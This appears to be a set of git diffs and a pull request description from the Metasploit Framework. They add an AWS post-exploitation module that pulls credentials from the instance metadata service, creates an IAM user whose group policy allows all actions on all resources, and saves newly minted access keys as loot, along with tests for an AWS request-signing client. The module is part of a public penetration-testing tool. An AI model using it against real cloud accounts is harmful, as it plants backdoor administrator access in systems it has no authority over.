-        OptString.new('METADATA_IP', [true, 'The metadata service IP', '169.254.169.254']),
         OptString.new('RHOST', [true, 'AWS IAM Endpoint', 'iam.amazonaws.com']),
         OptString.new('RPORT', [true, 'AWS IAM Endpoint TCP Port', 443]),
         OptString.new('SSL', [true, 'AWS IAM Endpoint SSL', true]),
@@ -33,6 +32,7 @@ class MetasploitModule < Msf::Post
       ])
     register_advanced_options(
       [
+        OptString.new('METADATA_IP', [true, 'The metadata service IP', '169.254.169.254']),
         OptString.new('AccessKeyId', [false, 'AWS access key', '']),
         OptString.new('SecretAccessKey', [false, 'AWS secret key', '']),
         OptString.new('Token', [false, 'AWS session token', ''])

--- a/modules/post/multi/escalate/aws_create_iam_user.rb
+++ b/modules/post/multi/escalate/aws_create_iam_user.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Post
     end
 
     # create user
-    username = datastore['IAM_USERNAME'] ? datastore['IAM_USERNAME'] : Rex::Text.rand_text_alphanumeric(16)
+    username = datastore['IAM_USERNAME'].empty? ? Rex::Text.rand_text_alphanumeric(16) : datastore['IAM_USERNAME']
     print_status("Creating user: #{username}")
     action = 'CreateUser'
     doc = call_iam(creds, 'Action' => action, 'UserName' => username)

--- a/modules/post/multi/escalate/aws_create_iam_user.rb
+++ b/modules/post/multi/escalate/aws_create_iam_user.rb
@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Post
         OptString.new('RPORT', [true, 'AWS IAM Endpoint TCP Port', 443]),
         OptString.new('SSL', [true, 'AWS IAM Endpoint SSL', true]),
         OptString.new('IAM_GROUP_POL', [true, 'IAM group policy to use', '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*" }]}']),
-        OptString.new('IAM_USERNAME', [true, 'Username for the user to be created', 'metasploit']),
+        OptString.new('IAM_USERNAME', [false, 'Username for the user to be created', '']),
         OptString.new('Region', [true, 'The default region', 'us-east-1' ])
       ])
     register_advanced_options(
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Post
     end
 
     # create user
-    username = datastore['IAM_USERNAME']
+    username = datastore['IAM_USERNAME'] ? datastore['IAM_USERNAME'] : Rex::Text.rand_text_alphanumeric(16)
     print_status("Creating user: #{username}")
     action = 'CreateUser'
     doc = call_iam(creds, 'Action' => action, 'UserName' => username)

--- a/modules/post/multi/escalate/aws_create_iam_user.rb
+++ b/modules/post/multi/escalate/aws_create_iam_user.rb
@@ -23,19 +23,19 @@ class MetasploitModule < Msf::Post
 
     register_options(
       [
-        OptString.new('RHOST', [true, 'AWS IAM Endpoint', 'iam.amazonaws.com']),
-        OptString.new('RPORT', [true, 'AWS IAM Endpoint TCP Port', 443]),
-        OptString.new('SSL', [true, 'AWS IAM Endpoint SSL', true]),
-        OptString.new('IAM_GROUP_POL', [true, 'IAM group policy to use', '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*" }]}']),
-        OptString.new('IAM_USERNAME', [false, 'Username for the user to be created', '']),
-        OptString.new('Region', [true, 'The default region', 'us-east-1' ])
+        OptString.new('IAM_USERNAME', [false, 'Name of the user to be created (leave empty or unset to use a random name)', ''])
       ])
     register_advanced_options(
       [
         OptString.new('METADATA_IP', [true, 'The metadata service IP', '169.254.169.254']),
         OptString.new('AccessKeyId', [false, 'AWS access key', '']),
         OptString.new('SecretAccessKey', [false, 'AWS secret key', '']),
-        OptString.new('Token', [false, 'AWS session token', ''])
+        OptString.new('Token', [false, 'AWS session token', '']),
+        OptString.new('RHOST', [true, 'AWS IAM Endpoint', 'iam.amazonaws.com']),
+        OptString.new('RPORT', [true, 'AWS IAM Endpoint TCP Port', 443]),
+        OptString.new('SSL', [true, 'AWS IAM Endpoint SSL', true]),
+        OptString.new('IAM_GROUP_POL', [true, 'IAM group policy to use', '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*" }]}']),
+        OptString.new('Region', [true, 'The default region', 'us-east-1' ])
       ])
     deregister_options('VHOST')
   end
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Post
     end
 
     # create user
-    username = datastore['IAM_USERNAME'].empty? ? Rex::Text.rand_text_alphanumeric(16) : datastore['IAM_USERNAME']
+    username = datastore['IAM_USERNAME'].blank? ? Rex::Text.rand_text_alphanumeric(16) : datastore['IAM_USERNAME']
     print_status("Creating user: #{username}")
     action = 'CreateUser'
     doc = call_iam(creds, 'Action' => action, 'UserName' => username)

--- a/modules/post/multi/escalate/aws_create_iam_user.rb
+++ b/modules/post/multi/escalate/aws_create_iam_user.rb
@@ -61,9 +61,9 @@ class MetasploitModule < Msf::Post
     else
       creds = {
         'AccessKeyId' => datastore['AccessKeyId'],
-        'SecretAccessKey' => datastore['SecretAccessKey'],
-        'Token' => datastore['Token']
+        'SecretAccessKey' => datastore['SecretAccessKey']
       }
+      creds['Token'] = datastore['Token'] unless datastore['Token'].blank?
     end
 
     # create user

--- a/modules/post/multi/escalate/aws_create_iam_user.rb
+++ b/modules/post/multi/escalate/aws_create_iam_user.rb
@@ -1,3 +1,8 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
 require 'msf/core'
 require 'metasploit/framework/aws/client'
 
@@ -5,26 +10,30 @@ class MetasploitModule < Msf::Post
 
   include Metasploit::Framework::Aws::Client
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "Create an AWS IAM User",
-      'Description'    => %q{
-        This module will attempt to create an AWS (Amazon Web Services) IAM
-        (Identity and Access Management) user with Admin privileges.
-      },
-      'License'        => MSF_LICENSE,
-      'Platform'      => %w(unix),
-      'SessionTypes'  => %w(shell meterpreter),
-      'Author'         => ['Javier Godinez <godinezj[at]gmail.com>'],
-      'References'     => [
-        [ 'URL', 'https://github.com/devsecops/bootcamp/raw/master/Week-6/slides/june-DSO-bootcamp-week-six-lesson-three.pdf' ]
-      ]
-    ))
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => "Create an AWS IAM User",
+        'Description'    => %q{
+          This module will attempt to create an AWS (Amazon Web Services) IAM
+          (Identity and Access Management) user with Admin privileges.
+        },
+        'License'        => MSF_LICENSE,
+        'Platform'       => %w(unix),
+        'SessionTypes'   => %w(shell meterpreter),
+        'Author'         => ['Javier Godinez <godinezj[at]gmail.com>'],
+        'References'     => [
+          [ 'URL', 'https://github.com/devsecops/bootcamp/raw/master/Week-6/slides/june-DSO-bootcamp-week-six-lesson-three.pdf' ]
+        ]
+      )
+    )
 
     register_options(
       [
         OptString.new('IAM_USERNAME', [false, 'Name of the user to be created (leave empty or unset to use a random name)', ''])
-      ])
+      ]
+    )
     register_advanced_options(
       [
         OptString.new('METADATA_IP', [true, 'The metadata service IP', '169.254.169.254']),
@@ -36,10 +45,10 @@ class MetasploitModule < Msf::Post
         OptString.new('SSL', [true, 'AWS IAM Endpoint SSL', true]),
         OptString.new('IAM_GROUP_POL', [true, 'IAM group policy to use', '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*" }]}']),
         OptString.new('Region', [true, 'The default region', 'us-east-1' ])
-      ])
+      ]
+    )
     deregister_options('VHOST')
   end
-
 
   def run
     # setup creds for making IAM API calls
@@ -119,4 +128,3 @@ class MetasploitModule < Msf::Post
     {}
   end
 end
-

--- a/modules/post/multi/escalate/aws_create_iam_user.rb
+++ b/modules/post/multi/escalate/aws_create_iam_user.rb
@@ -31,15 +31,15 @@ class MetasploitModule < Msf::Post
 
     register_options(
       [
-        OptString.new('IAM_USERNAME', [false, 'Name of the user to be created (leave empty or unset to use a random name)', ''])
+        OptString.new('IAM_USERNAME', [false, 'Name of the user to be created (leave empty or unset to use a random name)', '']),
+        OptString.new('AccessKeyId', [false, 'AWS access key', '']),
+        OptString.new('SecretAccessKey', [false, 'AWS secret key', '']),
+        OptString.new('Token', [false, 'AWS session token', ''])
       ]
     )
     register_advanced_options(
       [
         OptString.new('METADATA_IP', [true, 'The metadata service IP', '169.254.169.254']),
-        OptString.new('AccessKeyId', [false, 'AWS access key', '']),
-        OptString.new('SecretAccessKey', [false, 'AWS secret key', '']),
-        OptString.new('Token', [false, 'AWS session token', '']),
         OptString.new('RHOST', [true, 'AWS IAM Endpoint', 'iam.amazonaws.com']),
         OptString.new('RPORT', [true, 'AWS IAM Endpoint TCP Port', 443]),
         OptString.new('SSL', [true, 'AWS IAM Endpoint SSL', true]),

--- a/modules/post/multi/escalate/aws_create_iam_user.rb
+++ b/modules/post/multi/escalate/aws_create_iam_user.rb
@@ -1,0 +1,94 @@
+require 'msf/core'
+require 'metasploit/framework/aws/client'
+
+class MetasploitModule < Msf::Post
+
+  include Metasploit::Framework::Aws::Client
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Create an AWS IAM User",
+      'Description'    => %q{
+        This module will attempt to create an AWS (Amazon Web Services) IAM
+        (Identity and Access Management) user with Admin privileges.
+      },
+      'License'        => MSF_LICENSE,
+      'Platform'      => %w(unix),
+      'SessionTypes'  => %w(shell meterpreter),
+      'Author'         => ['Javier Godinez <godinezj[at]gmail.com>']
+    ))
+
+    register_options(
+      [
+        OptString.new('METADATA_IP', [true, 'The metadata service IP', '169.254.169.254']),
+        OptString.new('RHOST', [true, 'AWS IAM Endpoint', 'iam.amazonaws.com']),
+        OptString.new('RPORT', [true, 'AWS IAM Endpoint TCP Port', 443]),
+        OptString.new('SSL', [true, 'AWS IAM Endpoint SSL', true]),
+        OptString.new('IAM_GROUP_POL', [true, 'IAM group policy to use', '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*" }]}']),
+        OptString.new('IAM_USERNAME', [true, 'Username for the user to be created', 'metasploit']),
+        OptString.new('Region', [true, 'The default region', 'us-east-1' ])
+      ])
+    register_advanced_options(
+      [
+        OptString.new('AccessKeyId', [false, 'AWS access key', '']),
+        OptString.new('SecretAccessKey', [false, 'AWS secret key', '']),
+        OptString.new('Token', [false, 'AWS session token', ''])
+      ])
+    deregister_options('VHOST')
+  end
+
+
+  def run
+    # setup creds for making IAM API calls
+    creds = metadata_creds
+    if datastore['AccessKeyId'].empty?
+      if creds['AccessKeyId'].nil?
+        print_error("Clould not find creds")
+        return
+      end
+    else
+      creds = {
+        'AccessKeyId' => datastore['AccessKeyId'],
+        'SecretAccessKey' => datastore['SecretAccessKey'],
+        'Token' => datastore['Token']
+      }
+    end
+
+    # create user
+    username = datastore['IAM_USERNAME']
+    print_status("Creating user: #{username}")
+    action = 'CreateUser'
+    doc = call_iam(creds, 'Action' => action, 'UserName' => username)
+    print_results(doc, action)
+
+    # create group
+    print_status("Creating group: #{username}")
+    action = 'CreateGroup'
+    doc = call_iam(creds, 'Action' => action, 'GroupName' => username)
+    print_results(doc, action)
+
+    # create group policy
+    print_status("Creating group policy: #{username}")
+    pol_doc = datastore['IAM_GROUP_POL']
+    action = 'PutGroupPolicy'
+    doc = call_iam(creds, 'Action' => action, 'GroupName' => username, 'PolicyName' => username, 'PolicyDocument' => URI.encode(pol_doc))
+    print_results(doc, action)
+
+    # add user to group
+    print_status("Adding user (#{username}) to group: #{username}")
+    action = 'AddUserToGroup'
+    doc = call_iam(creds, 'Action' => action, 'UserName' => username, 'GroupName' => username)
+    print_results(doc, action)
+
+    # create API keys
+    print_status("Creating API Keys for #{username}")
+    action = 'CreateAccessKey'
+    doc = call_iam(creds, 'Action' => action, 'UserName' => username)
+    doc = print_results(doc, action)
+
+    return if doc.nil?
+    path = store_loot(doc['AccessKeyId'], 'text/plain', datastore['RHOST'], doc.to_json)
+    print_good("API keys stored at: " + path)
+  end
+end
+

--- a/modules/post/multi/escalate/aws_create_iam_user.rb
+++ b/modules/post/multi/escalate/aws_create_iam_user.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Post
     # setup creds for making IAM API calls
     creds = metadata_creds
     if datastore['AccessKeyId'].empty?
-      if creds['AccessKeyId'].empty?
+      unless creds.include?('AccessKeyId')
         print_error("Could not find creds")
         return
       end

--- a/modules/post/multi/escalate/aws_create_iam_user.rb
+++ b/modules/post/multi/escalate/aws_create_iam_user.rb
@@ -15,7 +15,10 @@ class MetasploitModule < Msf::Post
       'License'        => MSF_LICENSE,
       'Platform'      => %w(unix),
       'SessionTypes'  => %w(shell meterpreter),
-      'Author'         => ['Javier Godinez <godinezj[at]gmail.com>']
+      'Author'         => ['Javier Godinez <godinezj[at]gmail.com>'],
+      'References'     => [
+        [ 'URL', 'https://github.com/devsecops/bootcamp/raw/master/Week-6/slides/june-DSO-bootcamp-week-six-lesson-three.pdf' ]
+      ]
     ))
 
     register_options(
@@ -42,8 +45,8 @@ class MetasploitModule < Msf::Post
     # setup creds for making IAM API calls
     creds = metadata_creds
     if datastore['AccessKeyId'].empty?
-      if creds['AccessKeyId'].nil?
-        print_error("Clould not find creds")
+      if creds['AccessKeyId'].empty?
+        print_error("Could not find creds")
         return
       end
     else

--- a/spec/lib/metasploit/framework/aws/client_spec.rb
+++ b/spec/lib/metasploit/framework/aws/client_spec.rb
@@ -97,7 +97,7 @@ RSpec.describe Metasploit::Framework::Aws::Client do
   end
 
   it 'should create proper headers' do
-    h = subject.headers(creds, service, digest, digest.length, now)
+    h = subject.headers(creds, service, digest, now)
     expect(h.fetch('Content-Type')).to eq("application/x-www-form-urlencoded; charset=utf-8")
     expect(h.fetch('Accept-Encoding')).to be_empty
     expect(h.fetch('User-Agent')).to eq(Metasploit::Framework::Aws::Client::USER_AGENT)

--- a/spec/lib/metasploit/framework/aws/client_spec.rb
+++ b/spec/lib/metasploit/framework/aws/client_spec.rb
@@ -121,9 +121,4 @@ RSpec.describe Metasploit::Framework::Aws::Client do
     expect { subject.print_hsh(-42) }.not_to raise_error
     expect { subject.print_hsh('A' * 5000) }.not_to raise_error
   end
-
-  it 'should attempt an http call' do
-    expect(subject).to receive(:connect).and_raise(Rex::ConnectionError)
-    subject.call_api(creds, service, body_hash)
-  end
 end

--- a/spec/lib/metasploit/framework/aws/client_spec.rb
+++ b/spec/lib/metasploit/framework/aws/client_spec.rb
@@ -1,0 +1,129 @@
+require 'spec_helper'
+require 'metasploit/framework/aws/client'
+
+RSpec.describe Metasploit::Framework::Aws::Client do
+
+  subject do
+    s = Class.new(Msf::Auxiliary) do
+      include Metasploit::Framework::Aws::Client
+    end.new
+    s.datastore['Region'] = 'us-east-1'
+    s.datastore['RHOST'] = '127.0.0.1'
+    s
+  end
+
+  let(:body_hash) { { 'a' => 'b', 'b' => 'c' } }
+
+  let(:body) { 'a=b&b=c' }
+
+  let(:value) { 'metasploit' }
+
+  let(:key) { 'metasploit' }
+
+  let(:headers) { { 'H1' => 1, 'H2' => 2 } }
+
+  let(:headers_down_join) { headers.keys.map(&:downcase).join(';') }
+
+  let(:digest) { 'ca6ac6af66c22d8acdd6e42a00a9a21a24a37e3fa6a018662fb6dbaabfe7a96d' }
+
+  let(:body_digest) { '4044f25c89ec766b67d5e8c5d9e387cf209e740ee5ad65868f5a9f6e587acf43' }
+
+  let(:signature) { 'ac297b1b72d956a81bf9d2d20bfd98bca632c0607f2a8c896779f08d19e637d6' }
+
+  let(:creds) do
+    {
+      'AccessKeyId' => 'AWS_ACCESS_KEY_ID',
+      'SecretAccessKey' => 'AWS_SECRET_ACCESS_KEY',
+      'Token' => 'AWS_SESSION_TOKEN'
+    }
+  end
+
+  let(:now) { "20161124T175843Z" }
+
+  let(:service) { 'iam' }
+
+  let(:auth_header) { "AWS4-HMAC-SHA256 Credential=#{creds.fetch('AccessKeyId')}/#{now[0, 8]}/#{subject.datastore.fetch('Region')}/#{service}/aws4_request, SignedHeaders=#{headers_down_join}, Signature=#{signature}" }
+
+  it 'should create a SHA 265 digest' do
+    d = subject.hexdigest(value)
+    expect(d).to eq(digest)
+    expect(subject.hexdigest(nil)).to be_nil
+    expect(subject.hexdigest([])).to be_nil
+  end
+
+  it 'should perform proper hmac hashing' do
+    hmac = subject.hmac(key, value)
+    result = "\xD1?O\xA5\xFF\x7FT_\xC97\e\x01dp\x11)\x0FSL\xC3>\x1F\v\xA7\xD4\xEA\xB8\x99\xE0DW\xF7".force_encoding('ASCII-8BIT')
+    expect(hmac).to eq(result)
+    expect(subject.hmac([], value)).to be_nil
+    expect(subject.hmac(key, {})).to be_nil
+    expect(subject.hmac(key, nil)).to be_nil
+    expect(subject.hmac(nil, value)).to be_nil
+    expect(subject.hmac(1, 2)).to be_nil
+    expect(subject.hmac(nil, nil)).to be_nil
+  end
+
+  it 'should create a hex hmac' do
+    hexhmac = subject.hexhmac(key, value)
+    expect(hexhmac).to eq("d13f4fa5ff7f545fc9371b01647011290f534cc33e1f0ba7d4eab899e04457f7")
+    expect(subject.hexhmac([], value)).to be_nil
+    expect(subject.hexhmac(key, {})).to be_nil
+    expect(subject.hexhmac(key, nil)).to be_nil
+    expect(subject.hexhmac(nil, value)).to be_nil
+    expect(subject.hexhmac(1, 2)).to be_nil
+    expect(subject.hexhmac(nil, nil)).to be_nil
+  end
+
+  it 'should create a request' do
+    header_keys, request = subject.request_to_sign(headers, digest)
+    expect(header_keys).to eq(headers_down_join)
+    expect(request).to eq("POST\n/\n\nh1:1\nh2:2\n\n#{headers_down_join}\n#{digest}")
+  end
+
+  it 'should create a signed message' do
+    h, s = subject.sign(creds, service, headers, digest, now)
+    expect(h).to eq(headers_down_join)
+    expect(s).to eq(signature)
+  end
+
+  it 'should create an Authorization header' do
+    auth = subject.auth(creds, service, headers, digest, now)
+    expect(auth).to eq(auth_header)
+  end
+
+  it 'should create the request body' do
+    b = subject.body(body_hash)
+    expect(b).to eq(body)
+  end
+
+  it 'should create proper headers' do
+    h = subject.headers(creds, service, digest, digest.length, now)
+    expect(h.fetch('Content-Type')).to eq("application/x-www-form-urlencoded; charset=utf-8")
+    expect(h.fetch('Accept-Encoding')).to be_empty
+    expect(h.fetch('User-Agent')).to eq(Metasploit::Framework::Aws::Client::USER_AGENT)
+    expect(h.fetch('X-Amz-Date')).to eq(now)
+    expect(h.fetch('Host')).to eq(subject.datastore.fetch('RHOST'))
+    expect(h.fetch('X-Amz-Content-Sha256')).to eq(digest)
+    expect(h.fetch('Accept')).to eq('*/*')
+    expect(h.fetch('X-Amz-Security-Token')).to eq(creds.fetch('Token'))
+    expect(h.fetch('Authorization')).to eq("AWS4-HMAC-SHA256 Credential=AWS_ACCESS_KEY_ID/#{now[0, 8]}/#{subject.datastore.fetch('Region')}/#{service}/aws4_request, SignedHeaders=content-type;host;user-agent;x-amz-content-sha256;x-amz-date, Signature=275d7332d893de60eaf9f033e1f125f9f00e79c86b7b8902d620da778aff602b")
+  end
+
+  it 'should not error out with weird input' do
+    expect { subject.print_results({}, 'Test') }.to raise_error(KeyError)
+    expect { subject.print_results({ 'TestResponse' => nil }, 'Test') }.not_to raise_error
+    expect(subject.print_results({ 'TestResponse' => [] }, 'Test')).to eq({})
+  end
+
+  it 'should not error out with non Hash values' do
+    expect { subject.print_hsh(nil) }.not_to raise_error
+    expect { subject.print_hsh([]) }.not_to raise_error
+    expect { subject.print_hsh(-42) }.not_to raise_error
+    expect { subject.print_hsh('A' * 5000) }.not_to raise_error
+  end
+
+  it 'should attempt an http call' do
+    expect(subject).to receive(:connect).and_raise(Rex::ConnectionError)
+    subject.call_api(creds, service, body_hash)
+  end
+end


### PR DESCRIPTION
* Adds generic Amazon Web Services (AWS) client
* Escalates privs by creating an admin user in compromised AWS account

## Verification

Given a meterpreter session to an AWS instance having weak privs, do:

```
msf exploit(sshexec) > use auxiliary/admin/aws/aws_create_iam_user
msf post(aws_create_iam_user) > set SESSION 1
SESSION => 1
msf post(aws_create_iam_user) > exploit
```

see loot, e.g., $ cat ~/.msf4/loot/20161121175902_default_52.1.2.3_AKIA_881948.txt
